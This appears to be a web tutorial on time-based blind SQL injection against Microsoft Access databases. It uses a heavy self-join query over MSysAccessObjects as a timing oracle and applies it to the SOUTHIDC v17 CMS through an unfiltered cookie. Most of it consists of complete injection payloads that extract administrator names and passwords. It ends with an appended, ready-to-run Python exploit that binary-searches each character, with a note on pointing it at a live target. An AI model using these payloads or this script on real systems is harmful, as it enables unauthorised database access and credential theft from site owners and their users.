Implementing time-based blind SQL injection against an Access database

Source: Internet
Author: User
Tags: count, sql injection, access, database

Microsoft Access is a database management system that combines the Microsoft Jet database engine with a graphical user interface and software development tools. This article records how to carry out time-based blind SQL injection against an Access database.

  Overview

As is well known, Access has no sleep or delay function, so it does not support time-based blind injection natively. We can still build a delay ourselves with a heavy query (a deliberately expensive query) over the Access system table MSysAccessObjects. One caveat for practice: the delay a heavy query produces depends on the size of the table and the load on the server, so the number of self-joins has to be tuned per target until the slow and fast cases are clearly distinguishable.

  Preliminary exploration

We take the SOUTHIDCV17 database as an example.

Executing SELECT * FROM Southidc_about returns the results shown below.

How do we implement time-based injection? We use the following statement, a twelve-way self-join of MSysAccessObjects; the Cartesian product has (number of rows)^12 tuples, so counting them takes the engine a noticeable amount of time:

SELECT COUNT(*) FROM MSysAccessObjects AS t1, MSysAccessObjects AS t2, MSysAccessObjects AS t3, MSysAccessObjects AS t4, MSysAccessObjects AS t5, MSysAccessObjects AS t6,

MSysAccessObjects AS t7, MSysAccessObjects AS t8, MSysAccessObjects AS t9, MSysAccessObjects AS t10, MSysAccessObjects AS t11, MSysAccessObjects AS t12

The specific implementation methods are as follows:

SELECT * FROM Southidc_about WHERE (SELECT COUNT(*) FROM MSysAccessObjects AS t1, MSysAccessObjects AS t2, MSysAccessObjects AS t3, MSysAccessObjects AS t4, MSysAccessObjects AS t5, MSysAccessObjects AS t6,

MSysAccessObjects AS t7, MSysAccessObjects AS t8, MSysAccessObjects AS t9, MSysAccessObjects AS t10, MSysAccessObjects AS t11, MSysAccessObjects AS t12) > 0 AND (SELECT TOP 1 ASC(MID(adminname+password,1,1)) FROM

Southidc_admin) = 97

Run it once and observe the effect.

It took about 40 s to return the result.

Now change the trailing 97 to 96 and execute the following statement:

SELECT * FROM Southidc_about WHERE (SELECT COUNT(*) FROM MSysAccessObjects AS t1, MSysAccessObjects AS t2, MSysAccessObjects AS t3, MSysAccessObjects AS t4, MSysAccessObjects AS t5, MSysAccessObjects AS t6,

MSysAccessObjects AS t7, MSysAccessObjects AS t8, MSysAccessObjects AS t9, MSysAccessObjects AS t10, MSysAccessObjects AS t11, MSysAccessObjects AS t12) > 0 AND (SELECT TOP 1 ASC(MID(adminname+password,1,1)) FROM

Southidc_admin) = 96

It returned immediately, without any delay.

Clearly the delay comes from the WHERE condition

(SELECT COUNT(*) FROM MSysAccessObjects AS t1, MSysAccessObjects AS t2, MSysAccessObjects AS t3, MSysAccessObjects AS t4, MSysAccessObjects AS t5, MSysAccessObjects AS t6,

MSysAccessObjects AS t7, MSysAccessObjects AS t8, MSysAccessObjects AS t9, MSysAccessObjects AS t10, MSysAccessObjects AS t11, MSysAccessObjects AS t12) > 0

Note, however, that the order of the conditions matters: the subquery that produces the delay must be placed before

(SELECT TOP 1 ASC(MID(adminname+password,1,1)) FROM Southidc_admin) = 97

Why? This is simply what the experiment shows: with the heavy query first, the response is slow only when the character comparison is true (97) and fast when it is false (96), which is exactly the boolean oracle we need.

  Instance implementation

SOUTHIDC 17 contains a SQL injection vulnerability, but the conventional approach does not succeed in exploiting it. The vulnerable code is as follows:

Although the program filters POST and GET data, we can still inject through a cookie: in classic ASP, Request("name") with no collection specified searches QueryString, Form and then Cookies in turn, so a value the filter never looks at can be supplied as a cookie.

Let's put the injection to use.

The statement we are injecting into is built as follows (VBScript, reconstructed from the garbled extraction):

sql = "SELECT * FROM Southidc_" & Request("Range") & "sort WHERE viewflag AND parentid=" & ParentID & " ORDER BY id ASC"

We submit the following cookie:

Range=downsort WHERE (SELECT COUNT(*) FROM MSysAccessObjects AS t1, MSysAccessObjects AS t2, MSysAccessObjects AS t3, MSysAccessObjects AS t4, MSysAccessObjects AS t5, MSysAccessObjects AS t6, MSysAccessObjects AS t7, MSysAccessObjects AS t8, MSysAccessObjects AS t9, MSysAccessObjects AS t10, MSysAccessObjects AS t11, MSysAccessObjects AS t12) > 0 AND (SELECT TOP 1 ASC(MID(adminname+password,1,1)) FROM Southidc_admin) = 32 AND 1=1 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM Southidc_image

ParentID is the value passed in by the earlier part of the program, so the final statement is:

SELECT * FROM Southidc_downsort WHERE (SELECT COUNT(*) FROM MSysAccessObjects AS t1, MSysAccessObjects AS t2, MSysAccessObjects AS t3, MSysAccessObjects AS t4, MSysAccessObjects AS t5, MSysAccessObjects AS t6, MSysAccessObjects AS t7, MSysAccessObjects AS t8, MSysAccessObjects AS t9, MSysAccessObjects AS t10, MSysAccessObjects AS t11, MSysAccessObjects AS t12) > 0 AND (SELECT TOP 1 ASC(MID(adminname+password,1,1)) FROM Southidc_admin) = 32 AND 1=1 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM Southidc_imagesort WHERE viewflag AND parentid=1

The trailing UNION SELECT ... FROM Southidc_image is there only so that the text the program appends ("sort WHERE viewflag AND parentid=1") becomes a valid continuation (FROM Southidc_imagesort WHERE ...); the injected WHERE clause is what carries the timing oracle.

We can observe the effect by watching the response time.

With 96 there is no delay, as shown in the figure:

With 97 there is a delay, as shown in the figure:

Next we can turn the statement above into an exploit; the author wrote one in Python.

The core code is as follows:
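The article's own Python core code is not reproduced on this page. What follows is an added example, not the author's exploit, showing how a practitioner would drive the oracle described above. It assumes the Range cookie, table and column names from the article and a hypothetical target URL; it generalises the article's "= n" probe to "> n" so that each character can be recovered by binary search in about nine requests instead of up to ninety-five equality probes, and it assumes that a probe which errors or runs past the end of the string comes back without delay. A constructed offline stand-in for the timing oracle is included so the logic can be exercised without a server.

```python
"""Time-based blind extraction from an Access database via a heavy-query
cookie injection. Added example, not the original article's code.
Assumptions: target URL and cookie encoding are hypothetical; the '> n'
comparison and binary search generalise the article's '= n' probe; a probe
that errors or runs past the end of the string is assumed to return fast."""
import re
import time
import urllib.request
from typing import Callable

# Twelve-way self join of MSysAccessObjects, as in the article. The
# Cartesian product has rows^12 tuples, so COUNT(*) takes seconds to run.
HEAVY_QUERY = "(SELECT COUNT(*) FROM {})>0".format(
    ",".join(f"MSysAccessObjects AS t{i}" for i in range(1, 13)))


def build_range_cookie(pos: int, threshold: int,
                       table: str = "Southidc_admin",
                       expr: str = "adminname+password") -> str:
    """Value for the injected Range cookie.

    The heavy subquery comes first and the character test second, the order
    the article found necessary; the trailing UNION absorbs the
    'sort WHERE viewflag AND parentid=...' text the page appends."""
    return (
        "downsort WHERE " + HEAVY_QUERY
        + f" AND (SELECT TOP 1 ASC(MID({expr},{pos},1)) FROM {table})>{threshold}"
        + " AND 1=1 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM Southidc_image"
    )


def http_sender(url: str) -> Callable[[str], None]:
    """Return a function that requests url with the given Range cookie.
    Hypothetical target; not exercised offline. Cookie encoding may need
    adjusting for a real server."""
    def send(cookie_value: str) -> None:
        req = urllib.request.Request(url, headers={"Cookie": "Range=" + cookie_value})
        with urllib.request.urlopen(req, timeout=60) as resp:
            resp.read()
    return send


def timing_oracle(send: Callable[[str], None],
                  delay_s: float = 5.0) -> Callable[[str], bool]:
    """Turn a raw sender into a boolean oracle: True when the response took
    longer than delay_s, i.e. the heavy query ran because the character
    condition held. Tune delay_s to the target (the article saw ~40 s)."""
    def oracle(cookie_value: str) -> bool:
        t0 = time.perf_counter()
        send(cookie_value)
        return time.perf_counter() - t0 > delay_s
    return oracle


def extract_char(oracle: Callable[[str], bool], pos: int) -> int:
    """Binary search the ASC() value at pos; 0 when the string has ended.

    Invariant: value > lo holds and value > hi does not, so the answer is hi
    once hi - lo == 1. About nine probes per character."""
    if not oracle(build_range_cookie(pos, 0)):
        return 0
    lo, hi = 0, 255
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(build_range_cookie(pos, mid)):
            lo = mid
        else:
            hi = mid
    return hi


def extract_string(oracle: Callable[[str], bool], max_len: int = 64) -> str:
    """Recover adminname+password character by character."""
    out = []
    for pos in range(1, max_len + 1):
        code = extract_char(oracle, pos)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


def fake_oracle(secret: str) -> Callable[[str], bool]:
    """Constructed offline stand-in for timing_oracle: evaluates the probe
    against a made-up secret instead of a live server (testing only)."""
    probe = re.compile(r"ASC\(MID\([^,]+,(\d+),1\)\) FROM \w+\)>(\d+)")

    def oracle(cookie_value: str) -> bool:
        m = probe.search(cookie_value)
        pos, thr = int(m.group(1)), int(m.group(2))
        if pos > len(secret):
            return False  # assumed: empty/errored probe comes back fast
        return ord(secret[pos - 1]) > thr
    return oracle


if __name__ == "__main__":
    # Live use would be: oracle = timing_oracle(http_sender("http://target/down.asp"))
    print(extract_string(fake_oracle("admin21232f297a57a5a743894a0e4a801fc3")))
```

Swap fake_oracle for timing_oracle(http_sender(...)) to run against a real target. Because the oracle is purely "slow or fast", network jitter can flip a bit; in practice repeat any probe whose timing lands near delay_s before trusting it.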
